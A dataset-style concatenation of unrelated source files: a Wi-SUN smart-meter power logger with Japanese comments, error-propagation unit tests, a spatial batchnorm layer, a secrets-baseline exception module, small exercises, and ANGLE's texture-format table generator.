                elif self.search['search_words']: # a search is in progress
                    # A search word has been received.
search_words = self.search['search_words'][0]
if isinstance(search_words, list):
for word in search_words:
if msg_list['COMMAND'].startswith(word):
self.search['found_word_list'].append(msg_list)
self.search['search_words'].pop(0)
break
elif msg_list['COMMAND'].startswith(search_words):
self.search['found_word_list'].append(msg_list)
self.search['search_words'].pop(0)
elif self.search['ignore_intermidiate']:
                        pass # discard the intermediate received data
                    else: # it was not a search word
self.enqueue_message(msg_list)
                else: # no search in progress
self.enqueue_message(msg_list)
            elif self.search['timeout']: # read() timed out while a timeout was set by write()
if time.time() - self.search['start_time'] > self.search['timeout']:
self.search['found_word_list'] = []
self.search['search_words'] = []
self.search['timeout'] = 0
def sem_get(epc):
"""プロパティ値要求 'Get' """
global tid_counter
frame = sem.GET_FRAME_DICT['get_' + epc]
tid_counter = tid_counter + 1 if tid_counter + 1 != 65536 else 0 # TICカウントアップ
frame = sem.change_tid_frame(tid_counter, frame)
res = y3.udp_send(1, ip6, True, y3.Y3_UDP_ECHONET_PORT, frame)
def sem_get_getres(epc):
"""プロパティ値要求 'Get', 'GetRes'受信
epc: EHONET Liteプロパティ
"""
sem_get(epc) # 'Get'送信
start = time.time()
while True:
if y3.get_queue_size(): # データ受信
msg_list = y3.dequeue_message() # 受信データ取り出し
if msg_list['COMMAND'] == 'ERXUDP':
parsed_data = sem.parse_frame(msg_list['DATA'])
if parsed_data:
if parsed_data['tid'] != tid_counter:
errmsg = '[Error]: ECHONET Lite TID mismatch\n'
sys.stdout.write(errmsg)
return False
else:
return msg_list['DATA']
else:
sys.stdout.write('[Error]: ECHONET Lite frame error.\n')
return False
else:
sys.stdout.write('[Error]: Unknown data received.\n')
return False
        else: # no data received yet
            if time.time() - start > 20: # timeout: 20 s
sys.stdout.write('[Error]: Time out.\n')
return False
time.sleep(0.01)
def sem_seti(epc, edt):
"""プロパティ値書き込み要求(応答要) 'SetI'
---------------------------------
(注)未検証 (注)未検証 (注)未検証
---------------------------------
epc: Echonet Liteプロパティ(bytes)
edt: Echonet Liteプロパティ値データ(bytes)
return: True(成功) / False(失敗)"""
global tid_counter
tid_counter = tid_counter + 1 if tid_counter + 1 != 65536 else 0 # TICカウントアップ
ptys = [[epc, edt]]
frame = sem.make_frame(tid_counter, sem.ESV_CODE['setc'], ptys)
res = y3.udp_send(1, ip6, True, y3.Y3_UDP_ECHONET_PORT, frame)
start = time.time()
while True:
        if y3.get_queue_size(): # data received
            msg_list = y3.dequeue_message() # take the received data off the queue
if msg_list['COMMAND'] == 'ERXUDP':
parsed_data = sem.parse_frame(msg_list['DATA'])
if parsed_data:
if parsed_data['tid'] != tid_counter:
errmsg = '[Error]: ECHONET Lite TID mismatch\n'
sys.stdout.write(errmsg)
return False
else:
return msg_list['DATA']
else:
sys.stdout.write('[Error]: ECHONET Lite frame error.\n')
return False
else:
sys.stdout.write('[Error]: Unknown data received.\n')
return False
        else: # no data received yet
            if time.time() - start > 20: # timeout: 20 s
sys.stdout.write('[Error]: Time out.\n')
return False
time.sleep(0.01)
def pow_logfile_init(dt):
"""電力ログファイル初期設定"""
f = open(TMP_LOG_FILE , 'w') # 一時ログ初期化
f.close()
if not (os.path.isdir(LOG_DIR) and os.access(LOG_DIR, os.W_OK)): # ログ用ディレクトリ確認
return False
csv_day_files = [] # 10日分のログファイルリスト(CSV)
pkl_day_files = [] # (pickle)
for i in range(10): # 10日分の電力ログ作成
t = dt - datetime.timedelta(days = i) # 対象日のdatetime
# ログファイル名
dt_str = t.strftime(POW_DAY_LOG_FMT)
csv_filename = LOG_DIR + POW_DAY_LOG_HEAD + dt_str + '.csv'
pkl_filename = TMP_LOG_DIR + POW_DAY_LOG_HEAD + dt_str + '.pickle'
csv_day_files.append(csv_filename)
pkl_day_files.append(pkl_filename)
        if not os.path.exists(csv_filename): # create the power log (CSV) if it does not exist
            try:
                fcsv = open(csv_filename, 'w')
                fcsv.close()
            except:
                return False
        if not os.path.exists(pkl_filename): # create the power log (pickle) if it does not exist
            result = csv2pickle(csv_filename, pkl_filename, t)
            if not result:
                return False
    files = glob.glob(LOG_DIR + POW_DAY_LOG_HEAD + '*.csv') # find existing power logs (CSV)
    for f in files:
        if f in csv_day_files:
            continue
        else:
            os.remove(f) # delete old power logs (CSV)
    files = glob.glob(TMP_LOG_DIR + POW_DAY_LOG_HEAD + '*.pickle') # find existing power logs (pickle)
    for f in files:
        if f in pkl_day_files:
            continue
        else:
            os.remove(f) # delete old power logs (pickle)
    # Convert the CSV files into a JSON file
pickle2json(sorted(pkl_day_files), POW_DAYS_JSON_FILE)
return True
def pow_logfile_maintainance(last_dt, new_dt):
"""電力ログファイル更新"""
if last_dt.minute != new_dt.minute and new_dt.minute % 10 == 0: # 10分毎
dt_str = last_dt.strftime(POW_DAY_LOG_FMT)
today_csv_file = LOG_DIR + POW_DAY_LOG_HEAD + dt_str + '.csv'
today_pkl_file = TMP_LOG_DIR + POW_DAY_LOG_HEAD + dt_str + '.pickle'
file_cat(today_csv_file, TMP_LOG_FILE)
os.remove(TMP_LOG_FILE) # 一時ログファイルを削除
csv2pickle(today_csv_file, today_pkl_file, last_dt) # pickle更新
if last_dt.day != new_dt.day: # 日付変更
pow_logfile_init(new_dt) # 電力ログ初期化
else:
pkl_day_files = glob.glob(TMP_LOG_DIR + POW_DAY_LOG_HEAD + '*.pickle') # 電力ログ(pickle)検索
pickle2json(sorted(pkl_day_files), POW_DAYS_JSON_FILE) # CSVファイルをJSONファイルに変換
def file_cat(file_a, file_b):
"""ファイルを連結する"""
try:
fp_a = open(file_a, 'ab')
fp_b = open(file_b, 'rb')
fp_a.write(fp_b.read())
fp_a.close()
fp_b.close()
return True
except:
return False
def csv2pickle(csvfile, pklfile, dt):
"""csvファイルをpickleファイルに変換"""
try:
fcsv = open(csvfile, 'r')
fpkl = open(pklfile, 'wb')
data = fcsv.readlines()
except:
return False
    if data == []: # the CSV file is empty because it was just created
        # build a 00:00 timestamp from the dt argument (datetime)
        ts_origin = datetime.datetime.combine(dt, datetime.time(0, 0)).timestamp()
    else:
        ts = int(data[0].strip().split(',')[0]) # get a timestamp from the log
        dt = datetime.datetime.fromtimestamp(ts) # and build the 00:00 timestamp from it
        ts_origin = datetime.datetime(dt.year, dt.month, dt.day).timestamp()
    data_work = [[None, []] for row in range(60 * 24)] # empty working buffer
    for minute in range(60 * 24):
        data_work[minute][0] = ts_origin + 60 * minute # timestamps at 1-minute intervals
    for row in data:
        row_list = row.strip().split(',') # [timestamp (s), power]
        if row_list[1] != 'None':
            minute = int((int(row_list[0]) - ts_origin) / 60) # minutes elapsed since 00:00
            if minute > 0 and minute < 60 * 24:
                data_work[minute][1].append(int(row_list[1])) # add the power value
    data_summary = [[None, None] for row in range(60 * 24)] # empty buffer for aggregation
for minute, data in enumerate(data_work):
data_summary[minute][0] = data[0]
if len(data[1]):
            data_summary[minute][1] = round(sum(data[1]) / len(data[1])) # average power
pickle.dump(data_summary, fpkl)
fcsv.close()
fpkl.close()
return True
def pickle2json(pklfiles, jsonfile):
"""pickleファイルをJSONファイルに変換する"""
data = []
for fpkl in pklfiles:
try:
f = open(fpkl, 'rb')
d = pickle.load(f)
data = data + d
except:
return False
json_data = []
for row in data:
row = [int(row[0])*1000, None if row[1] is None else int(row[1])]
json_data.append(row)
s = json.dumps(json_data)
try:
f = open(jsonfile, 'w')
f.write(s)
f.close()
return True
except:
return False
# Command-line arguments
def arg_parse():
p = argparse.ArgumentParser()
p.add_argument('-d', '--delay', help='This script starts after a delay of [n] seconds.', default=0, type=int)
args = p.parse_args()
return args
if __name__ == '__main__':
args = arg_parse()
    if args.delay: # wait time before starting the script; used to delay sem_com.py when it is launched together with sem_app
if isinstance(args.delay, int):
ws = args.delay
sys.stdout.write('Waiting for {} seconds...\n'.format(ws))
time.sleep(ws)
os.chdir(os.path.dirname(os.path.abspath(__file__)))
    sem_inf_list = [] # property notifications from the smart meter
    tid_counter = 0 # TID counter
    pana_ts = 0.0 # timestamp of the last PANA authentication
    saved_dt = datetime.datetime.now() # remember the current date and time
    sys.stdout.write('Log files setup...\n')
    result = pow_logfile_init(saved_dt) # initialize the log files
if not result:
sys.stdout.write('[Error]: Log file error\n')
sys.exit(-1)
gpio_init()
led = LedThread()
led.start()
led.oneshot()
y3 = Y3ModuleSub()
y3.uart_open(dev='/dev/ttyAMA0', baud=115200, timeout=1)
y3.start()
sys.stdout.write('Wi-SUN reset...\n')
y3reset()
y3.set_echoback_off()
y3.set_opt(True)
y3.set_password(user_conf.SEM_PASSWORD)
y3.set_routeb_id(user_conf.SEM_ROUTEB_ID)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(SOCK_FILE)
except:
sock = None
channel_list = []
sem_exist = False
for i in range(10):
sys.stdout.write('({}/10) Active scan with a duration of {}...\n'.format(i+1, user_conf.SEM_DURATION))
channel_list = y3.active_scan(user_conf.SEM_DURATION)
        if channel_list is False: # active_scan() was aborted with Ctrl+C
break
if channel_list:
sem_exist = True
break
    if not sem_exist: # scan failed
sys.stdout.write('[Error]: Can not connect to a smart energy meter\n')
if sem_exist:
ch = channel_list[0]
sys.stdout.write('Energy Meter: [Ch.0x{:02X}, Addr.{}, LQI.{}, PAN.0x{:04X}]\n'.format(ch['Channel'],
ch['Addr'], ch['LQI'], ch['Pan ID']))
        # set the channel
        y3.set_channel(ch['Channel'])
        sys.stdout.write('Set channel to 0x{:02X}\n'.format(ch['Channel']))
        # IPv6 address of the smart meter
        ip6 = y3.get_ip6(ch['Addr'])
        sys.stdout.write('IP6 address is \'{}\'\n'.format(ip6))
        # PAN ID
        y3.set_pan_id(ch['Pan ID'])
        sys.stdout.write('Set PAN ID to 0x{:04X}\n'.format(ch['Pan ID']))
        # PANA authentication (PaC)
sem_exist = False
pana_done = False
for i in range(10):
sys.stdout.write('({}/10) PANA connection...\n'.format(i+1))
sem_exist = y3.start_pac(ip6)
            if sem_exist: # wait for the instance list notification
st = time.time()
while True:
if sem_inf_list:
                        pana_ts = time.time() # save the timestamp
sys.stdout.write('Successfully done.\n')
time.sleep(3)
pana_done = True
break
                    elif time.time() - st > 15: # timeout: PANA authentication failed
sys.stdout.write('Fail to connect.\n')
sem_exist = False
pana_done = False
break
else:
time.sleep(0.1)
if pana_done:
break
if sem_exist:
sem = EchonetLiteSmartEnergyMeter()
get_list = ['operation_status', 'location', 'version', 'fault_status',
'manufacturer_code', 'production_no',
'current_time', 'current_date',
'get_pty_map', 'set_pty_map', 'chg_pty_map',
'epc_coefficient', 'digits', 'unit_amount_energy', 'amount_energy_normal',
'recent_amount_energy_norm', 'hist_amount_energy1_norm']
        for epc in get_list: # fetch each piece of data
edt = False
for i in range(10):
data = sem_get_getres(epc)
if data:
parsed_data = sem.parse_frame(data)
if parsed_data:
edt = parsed_data['ptys'][0]['edt']
break
else:
                        continue # Get failed, retry
                else: # Get failed, retry
continue
if edt:
if epc == 'operation_status':
result = True if edt == b'\x30' else False
elif epc == 'location':
result = binascii.b2a_hex(edt)
elif epc == 'version':
result = edt[2:3].decode()
elif epc == 'manufacturer_code':
result = binascii.b2a_hex(edt)
elif epc == 'production_no':
result = binascii.b2a_hex(edt)
elif epc == 'current_time':
hour = int.from_bytes(edt[0:1], 'big')
min = int.from_bytes(edt[1:2], 'big')
result = datetime.time(hour, min)
elif epc == 'current_date':
year = int.from_bytes(edt[0:2], 'big')
month = int.from_bytes(edt[2:3], 'big')
day = int.from_bytes(edt[3:4], 'big')
result = datetime.date(year, month, day)
elif epc == 'fault_status':
result = True if edt == b'\x42' else False
elif epc == 'get_pty_map':
result = binascii.b2a_hex(edt)
elif epc == 'set_pty_map':
result = binascii.b2a_hex(edt)
elif epc == 'chg_pty_map':
result = binascii.b2a_hex(edt)
elif epc == 'epc_coefficient':
result = int.from_bytes(edt, 'big')
elif epc == 'digits':
result = int.from_bytes(edt, 'big')
elif epc == 'unit_amount_energy':
if edt == b'\x00':
result = 1.0
elif edt == b'\x01':
result = 0.1
elif edt == b'\x02':
result = 0.01
elif edt == b'\x03':
result = 0.001
elif edt == b'\x04':
result = 0.0001
elif edt == b'\x0A':
result = 10.0
elif edt == b'\x0B':
result = 100.0
elif edt == b'\x0C':
result = 1000.0
elif edt == b'\x0D':
result = 10000.0
else:
result = 0.0
elif epc == 'amount_energy_normal':
result = int.from_bytes(edt, 'big')
result *= sem_info['epc_coefficient'] * sem_info['unit_amount_energy']
elif epc == 'recent_amount_energy_norm':
dt = sem.parse_datetime(edt[0:7])
energy = int.from_bytes(edt[7:11], 'big')
energy *= sem_info['epc_coefficient'] * sem_info['unit_amount_energy']
result = [dt, energy]
elif epc == 'hist_amount_energy1_norm':
result = binascii.b2a_hex(edt)
sem_info[epc] = result
sys.stdout.write('[Get]: {}, {}\n'.format(epc, result))
            else: # Get failed 10 times
sys.stdout.write('[Error]: Can not get {}.\n'.format(epc))
sem_exist = False
break
if sem_exist:
        start = time.time() - 1000 # start 1000 s in the past so the first poll happens immediately
while True:
try:
pana_done = False
                if (time.time() - pana_ts > 12 * 60 * 60): # renew the PANA authentication every 12 hours
sys.stdout.write('PANA re-connection...\n')
sem_exist = y3.restart_pac()
                    if sem_exist: # wait for the instance list notification
st = time.time()
while True:
if sem_inf_list:
                                pana_ts = time.time() # save the timestamp
pana_done = True
sys.stdout.write('Successfully done.\n')
time.sleep(3)
break
                            elif time.time() - st > 15: # timeout: PANA authentication failed
sys.stdout.write('Fail to connect.\n')
break
else:
time.sleep(0.1)
if not pana_done:
                        break # give up after PANA authentication failure
while True:
if (time.time() - start) >= user_conf.SEM_INTERVAL:
start = time.time()
break
else:
time.sleep(0.1)
sem_get('instant_power') # Get
                while True: # loop waiting for GetRes
rcd_time = time.time() # rcd_time[s]
new_dt = datetime.datetime.fromtimestamp(rcd_time)
                    # log file maintenance
pow_logfile_maintainance(saved_dt, new_dt)
saved_dt = new_dt
if y3.get_queue_size():
msg_list = y3.dequeue_message()
if msg_list['COMMAND'] == 'ERXUDP':
led.oneshot()
parsed_data = sem.parse_frame(msg_list['DATA'])
if parsed_data:
if parsed_data['tid'] != tid_counter:
errmsg = '[Error]: ECHONET Lite TID mismatch\n'
sys.stdout.write(errmsg)
else:
watt_int = int.from_bytes(parsed_data['ptys'][0]['edt'], 'big', signed=True)
sys.stdout.write('[{:5d}] {:4d} W\n'.format(tid_counter, watt_int))
sys.stdout.flush()
with open(CURR_POW_FILE, 'w') as fs:
fs.write(str(watt_int))
                                    try: # write to the temporary log file
                                        f = open(TMP_LOG_FILE, 'a') # rcd_time[ms] (for JavaScript)
f.write('{},{}\n'.format(round(rcd_time), watt_int))
f.close()
except:
sys.stdout.write('[Error]: can not write to file.\n')
                                    if sock: # send over the UNIX domain socket
sock_data = json.dumps({'time': rcd_time, 'power': watt_int}).encode('utf-8')
try:
sock.send(sock_data)
except:
sys.stdout.write('[Error]: Broken socket.\n')
break
                            else: # the frame is corrupted
errmsg = '[Error]: ECHONET Lite frame error\n'
sys.stdout.write(errmsg)
                        else: # the frame is corrupted???
errmsg = '[Error]: Unknown data received.\n'
sys.stdout.write(errmsg)
                    else: # still waiting for GetRes
while sem_inf_list:
inf = sem_inf_list.pop(0)
sys.stdout.write('[Inf]: {}\n'.format(inf['DATA']))
                        if time.time() - start > 20: # maximum wait for GetRes: 20 s
sys.stdout.write('[Error]: Time out.\n')
                            try: # write to the temporary log file
f = open(TMP_LOG_FILE, 'a')
f.write('{},None\n'.format(round(rcd_time)))
f.close()
except:
sys.stdout.write('[Error]: can not write to file.\n')
break
time.sleep(0.1)
except KeyboardInterrupt:
break
else:
sys.stdout.write('[Error]: Can not connect with a smart energy meter.\n')
    # shutdown processing
if sock:
try:
sock.close()
except:
sys.stdout.write('[Error]: Broken socket.\n')
sys.stdout.write('\nWi-SUN reset...\n')
y3reset()
y3.terminate()
y3.uart_close()
led.terminate()
gpio.cleanup()
if os.path.exists(TMP_LOG_FILE):
os.remove(TMP_LOG_FILE)
sys.stdout.write('Bye.\n')
sys.exit(0)
| StarcoderdataPython |
1623868 |
fileLines = open('exercise101.py','r')
lines = fileLines.readlines()
fileLines.close()
for line in range(len(lines)-1, -1, -1):  # stop at -1 so index 0 (the first line) is included
lineStr = lines[line]
if len(lineStr.strip()) > 0 :
print(lineStr, end="") | StarcoderdataPython |
3350123 | <gh_stars>1-10
def solution(r):
answer = 0
for i in range(1, r):
for j in range(1, r):
if i ** 2 + j ** 2 <= r ** 2:
answer += 1
return answer * 4
def main():
r = int(input())
print(solution(r))
if __name__ == '__main__':
main()
| StarcoderdataPython |
192991 | import math
from tf_pwa.err_num import *
def test_add():
a = NumberError(1.0, 0.3)
b = NumberError(2.0, 0.4)
c = a + b
assert c.value == 3.0
assert c.error == 0.5
d = b - a
assert d.value == 1.0
assert d.error == 0.5
e = -a
assert e.value == -1.0
assert e.error == 0.3
f = a - 1.0
d = a + 3.0
def test_mul():
a = NumberError(3.0, 0.3)
b = NumberError(2.0, 0.4)
c = a * b
assert c.value == 6.0
assert c.error == math.sqrt(1.8)
d = a / b
assert d.value == 1.5
assert d.error == math.sqrt(0.1125)
e = b ** 3
assert e.value == 8.0
assert abs(e.error - math.sqrt(23.04)) < 1e-7
f = b ** a
g = 3.0 ** a
def test_exp():
a = NumberError(3.0, 0.3)
b = NumberError(2.0, 0.4)
c = a.exp()
d = b.log()
e = a.apply(math.sqrt)
g = a.apply(math.sin, math.cos)
print(g)
def test_cal_err():
a = NumberError(3.0, 0.3)
b = NumberError(2.0, 0.3)
f = lambda x: x * 3.0 + x ** 2 * 2.0 + 1.0
c = cal_err(f, a)
g = lambda x, y: x + y + (x - y) * (x + y)
d = cal_err(g, a, b)
e = cal_err(g, 3.0, b)
h = cal_err(g, a, 2.0)
assert d.value == e.value
assert e.value == h.value
| StarcoderdataPython |
1793278 | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 26 16:56:08 2018
@author: lenovo
"""
from sklearn.svm import SVC
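# Note: this fragment assumes `sel` (with x_train / y_train), `test_data` and
# `test_label` were prepared by an earlier step (e.g. a feature-selection script);
# they are not defined in this file.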
clf = SVC()
clf.fit(sel.x_train, sel.y_train)
pred=clf.predict(test_data)
pred[pred==1]=0
pred[pred==3]=1
a=pred-test_label.T
a=a.T
sum(a==0)/206 | StarcoderdataPython |
3375166 | <gh_stars>1000+
class UnableToReadBaselineError(ValueError):
"""Think of this as a 404, if getting a baseline had a HTTPError code."""
pass
class InvalidBaselineError(ValueError):
"""Think of this as a 400, if getting a baseline had a HTTPError code."""
pass
class InvalidFile(ValueError):
"""Think of this as a 400, if FileNotFoundError was a 404 HTTPError code."""
pass
class SecretNotFoundOnSpecifiedLineError(Exception):
def __init__(self, line: int) -> None:
super().__init__(
'ERROR: Secret not found on line {}!\n'.format(line)
+ 'Try recreating your baseline to fix this issue.',
)
class NoLineNumberError(Exception):
def __init__(self) -> None:
super().__init__(
'ERROR: No line numbers found in baseline! Line numbers are needed '
'for auditing secret occurrences. Try recreating your baseline to fix '
'this issue.',
)
| StarcoderdataPython |
49264 | from __future__ import annotations
from edutorch.typing import NPArray
from .batchnorm import BatchNorm
class SpatialBatchNorm(BatchNorm):
def forward(self, x: NPArray) -> NPArray:
"""
Computes the forward pass for spatial batch normalization.
Inputs:
- x: Input data of shape (N, C, H, W)
- gamma: Scale parameter, of shape (C,)
- beta: Shift parameter, of shape (C,)
- bn_param: Dictionary with the following keys:
- mode: 'train' or 'test'; required
- eps: Constant for numeric stability
- momentum: Constant for running mean / variance. momentum=0 means that
old information is discarded completely at every time step, while
momentum=1 means that new information is never incorporated. The
default of momentum=0.9 should work well in most situations.
- running_mean: Array of shape (D,) giving running mean of features
- running_var Array of shape (D,) giving running variance of features
Returns a tuple of:
- out: Output data, of shape (N, C, H, W)
- cache: Values needed for the backward pass
"""
N, C, H, W = x.shape
x_flat = x.transpose(0, 2, 3, 1).reshape(-1, C)
out_flat = super().forward(x_flat)
out = out_flat.reshape(N, H, W, C).transpose(0, 3, 1, 2)
return out
def backward(self, dout: NPArray) -> tuple[NPArray, ...]:
"""
Computes the backward pass for spatial batch normalization.
Inputs:
- dout: Upstream derivatives, of shape (N, C, H, W)
- cache: Values from the forward pass
Returns a tuple of:
- dx: Gradient with respect to inputs, of shape (N, C, H, W)
- dgamma: Gradient with respect to scale parameter, of shape (C,)
- dbeta: Gradient with respect to shift parameter, of shape (C,)
"""
N, C, H, W = dout.shape
dout_flat = dout.transpose(0, 2, 3, 1).reshape(-1, C)
dx_flat, dgamma, dbeta = super().backward(dout_flat)
dx = dx_flat.reshape(N, H, W, C).transpose(0, 3, 1, 2)
return dx, dgamma, dbeta
| StarcoderdataPython |
4814464 | #!/usr/bin/python
# Copyright 2015 The ANGLE Project Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# gen_texture_format_table.py:
# Code generation for texture format map
#
import json
import pprint
template = """// GENERATED FILE - DO NOT EDIT.
// Generated by gen_texture_format_table.py using data from texture_format_data.json
//
// Copyright 2015 The ANGLE Project Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
//
// texture_format_table:
// Queries for full textureFormat information based in internalFormat
//
#include "libANGLE/renderer/d3d/d3d11/texture_format_table.h"
#include "libANGLE/renderer/d3d/d3d11/formatutils11.h"
#include "libANGLE/renderer/d3d/d3d11/internal_format_initializer_table.h"
#include "libANGLE/renderer/d3d/d3d11/load_functions_table.h"
#include "libANGLE/renderer/d3d/d3d11/renderer11_utils.h"
#include "libANGLE/renderer/d3d/d3d11/swizzle_format_info.h"
#include "libANGLE/renderer/d3d/loadimage.h"
namespace rx
{{
namespace d3d11
{{
namespace
{{
typedef bool (*FormatSupportFunction)(const Renderer11DeviceCaps &);
bool AnyDevice(const Renderer11DeviceCaps &deviceCaps)
{{
return true;
}}
bool OnlyFL10Plus(const Renderer11DeviceCaps &deviceCaps)
{{
return (deviceCaps.featureLevel >= D3D_FEATURE_LEVEL_10_0);
}}
bool OnlyFL9_3(const Renderer11DeviceCaps &deviceCaps)
{{
return (deviceCaps.featureLevel == D3D_FEATURE_LEVEL_9_3);
}}
template <DXGI_FORMAT format, bool requireSupport>
bool SupportsFormat(const Renderer11DeviceCaps &deviceCaps)
{{
// Must support texture, SRV and RTV support
UINT mustSupport = D3D11_FORMAT_SUPPORT_TEXTURE2D | D3D11_FORMAT_SUPPORT_TEXTURECUBE |
D3D11_FORMAT_SUPPORT_SHADER_SAMPLE | D3D11_FORMAT_SUPPORT_MIP |
D3D11_FORMAT_SUPPORT_RENDER_TARGET;
if (d3d11_gl::GetMaximumClientVersion(deviceCaps.featureLevel) > 2)
{{
mustSupport |= D3D11_FORMAT_SUPPORT_TEXTURE3D;
}}
bool fullSupport = false;
if (format == DXGI_FORMAT_B5G6R5_UNORM)
{{
// All hardware that supports DXGI_FORMAT_B5G6R5_UNORM should support autogen mipmaps, but
// check anyway.
mustSupport |= D3D11_FORMAT_SUPPORT_MIP_AUTOGEN;
fullSupport = ((deviceCaps.B5G6R5support & mustSupport) == mustSupport);
}}
else if (format == DXGI_FORMAT_B4G4R4A4_UNORM)
{{
fullSupport = ((deviceCaps.B4G4R4A4support & mustSupport) == mustSupport);
}}
else if (format == DXGI_FORMAT_B5G5R5A1_UNORM)
{{
fullSupport = ((deviceCaps.B5G5R5A1support & mustSupport) == mustSupport);
}}
else
{{
UNREACHABLE();
return false;
}}
// This 'SupportsFormat' function is used by individual entries in the D3D11 Format Map below,
// which maps GL formats to DXGI formats.
if (requireSupport)
{{
// This means that ANGLE would like to use the entry in the map if the inputted DXGI format
// *IS* supported.
// e.g. the entry might map GL_RGB5_A1 to DXGI_FORMAT_B5G5R5A1, which should only be used if
// DXGI_FORMAT_B5G5R5A1 is supported.
// In this case, we should only return 'true' if the format *IS* supported.
return fullSupport;
}}
else
{{
// This means that ANGLE would like to use the entry in the map if the inputted DXGI format
// *ISN'T* supported.
// This might be a fallback entry. e.g. for ANGLE to use DXGI_FORMAT_R8G8B8A8_UNORM if
// DXGI_FORMAT_B5G5R5A1 isn't supported.
// In this case, we should only return 'true' if the format *ISN'T* supported.
return !fullSupport;
}}
}}
// End Format Support Functions
// For sized GL internal formats, there are several possible corresponding D3D11 formats depending
// on device capabilities.
// This function allows querying for the DXGI texture formats to use for textures, SRVs, RTVs and
// DSVs given a GL internal format.
const TextureFormat GetD3D11FormatInfo(GLenum internalFormat,
DXGI_FORMAT texFormat,
DXGI_FORMAT srvFormat,
DXGI_FORMAT rtvFormat,
DXGI_FORMAT dsvFormat)
{{
TextureFormat info;
info.texFormat = texFormat;
info.srvFormat = srvFormat;
info.rtvFormat = rtvFormat;
info.dsvFormat = dsvFormat;
// Given a GL internal format, the renderFormat is the DSV format if it is depth- or
// stencil-renderable,
// the RTV format if it is color-renderable, and the (nonrenderable) texture format otherwise.
if (dsvFormat != DXGI_FORMAT_UNKNOWN)
{{
info.renderFormat = dsvFormat;
}}
else if (rtvFormat != DXGI_FORMAT_UNKNOWN)
{{
info.renderFormat = rtvFormat;
}}
else if (texFormat != DXGI_FORMAT_UNKNOWN)
{{
info.renderFormat = texFormat;
}}
else
{{
info.renderFormat = DXGI_FORMAT_UNKNOWN;
}}
// Compute the swizzle formats
const gl::InternalFormat &formatInfo = gl::GetInternalFormatInfo(internalFormat);
if (internalFormat != GL_NONE && formatInfo.pixelBytes > 0)
{{
if (formatInfo.componentCount != 4 || texFormat == DXGI_FORMAT_UNKNOWN ||
srvFormat == DXGI_FORMAT_UNKNOWN || rtvFormat == DXGI_FORMAT_UNKNOWN)
{{
// Get the maximum sized component
unsigned int maxBits = 1;
if (formatInfo.compressed)
{{
unsigned int compressedBitsPerBlock = formatInfo.pixelBytes * 8;
unsigned int blockSize =
formatInfo.compressedBlockWidth * formatInfo.compressedBlockHeight;
maxBits = std::max(compressedBitsPerBlock / blockSize, maxBits);
}}
else
{{
maxBits = std::max(maxBits, formatInfo.alphaBits);
maxBits = std::max(maxBits, formatInfo.redBits);
maxBits = std::max(maxBits, formatInfo.greenBits);
maxBits = std::max(maxBits, formatInfo.blueBits);
maxBits = std::max(maxBits, formatInfo.luminanceBits);
maxBits = std::max(maxBits, formatInfo.depthBits);
}}
maxBits = roundUp(maxBits, 8U);
const SwizzleFormatInfo &swizzleInfo =
GetSwizzleFormatInfo(maxBits, formatInfo.componentType);
info.swizzleTexFormat = swizzleInfo.mTexFormat;
info.swizzleSRVFormat = swizzleInfo.mSRVFormat;
info.swizzleRTVFormat = swizzleInfo.mRTVFormat;
}}
else
{{
// The original texture format is suitable for swizzle operations
info.swizzleTexFormat = texFormat;
info.swizzleSRVFormat = srvFormat;
info.swizzleRTVFormat = rtvFormat;
}}
}}
else
{{
// Not possible to swizzle with this texture format since it is either unsized or GL_NONE
info.swizzleTexFormat = DXGI_FORMAT_UNKNOWN;
info.swizzleSRVFormat = DXGI_FORMAT_UNKNOWN;
info.swizzleRTVFormat = DXGI_FORMAT_UNKNOWN;
}}
// Check if there is an initialization function for this texture format
info.dataInitializerFunction = GetInternalFormatInitializer(internalFormat, texFormat);
// Gather all the load functions for this internal format
info.loadFunctions = GetLoadFunctionsMap(internalFormat, texFormat);
ASSERT(info.loadFunctions.size() != 0 || internalFormat == GL_NONE);
return info;
}}
}} // namespace
TextureFormat::TextureFormat()
: texFormat(DXGI_FORMAT_UNKNOWN),
srvFormat(DXGI_FORMAT_UNKNOWN),
rtvFormat(DXGI_FORMAT_UNKNOWN),
dsvFormat(DXGI_FORMAT_UNKNOWN),
renderFormat(DXGI_FORMAT_UNKNOWN),
swizzleTexFormat(DXGI_FORMAT_UNKNOWN),
swizzleSRVFormat(DXGI_FORMAT_UNKNOWN),
swizzleRTVFormat(DXGI_FORMAT_UNKNOWN),
dataInitializerFunction(NULL),
loadFunctions()
{{
}}
const TextureFormat &GetTextureFormatInfo(GLenum internalFormat,
const Renderer11DeviceCaps &renderer11DeviceCaps)
{{
// clang-format off
switch (internalFormat)
{{
{data}
default:
break;
}}
// clang-format on
static const TextureFormat defaultInfo;
return defaultInfo;
}} // GetTextureFormatInfo
}} // namespace d3d11
}} // namespace rx
"""
tex_format = "texFormat"
srv_format = "srvFormat"
rtv_format = "rtvFormat"
dsv_format = "dsvFormat"
def get_texture_format_item(idx, texture_format):
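    # Builds one `if` / `else if` branch per candidate DXGI format; a branch is taken
    # when its requirements function reports that the device supports that format.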
table_data = '';
if idx == 0:
table_data += ' if (' + texture_format["requirementsFcn"] + '(renderer11DeviceCaps))\n'
else:
table_data += ' else if (' + texture_format["requirementsFcn"] + '(renderer11DeviceCaps))\n'
table_data += ' {\n'
table_data += ' static const TextureFormat textureFormat = GetD3D11FormatInfo(internalFormat,\n'
table_data += ' ' + texture_format[tex_format] + ',\n'
table_data += ' ' + texture_format[srv_format] + ',\n'
table_data += ' ' + texture_format[rtv_format] + ',\n'
table_data += ' ' + texture_format[dsv_format] + ');\n'
table_data += ' return textureFormat;\n'
table_data += ' }\n'
return table_data
def parse_json_into_switch_string(json_data):
table_data = ''
for internal_format_item in sorted(json_data.iteritems()):
internal_format = internal_format_item[0]
table_data += ' case ' + internal_format + ':\n'
table_data += ' {\n'
for idx, texture_format in enumerate(sorted(json_data[internal_format])):
table_data += get_texture_format_item(idx, texture_format)
table_data += ' else\n'
table_data += ' {\n'
table_data += ' break;\n'
table_data += ' }\n'
table_data += ' }\n'
return table_data
with open('texture_format_data.json') as texture_format_json_file:
texture_format_data = texture_format_json_file.read();
texture_format_json_file.close()
json_data = json.loads(texture_format_data)
table_data = parse_json_into_switch_string(json_data)
output = template.format(data=table_data)
with open('texture_format_table_autogen.cpp', 'wt') as out_file:
out_file.write(output)
out_file.close()
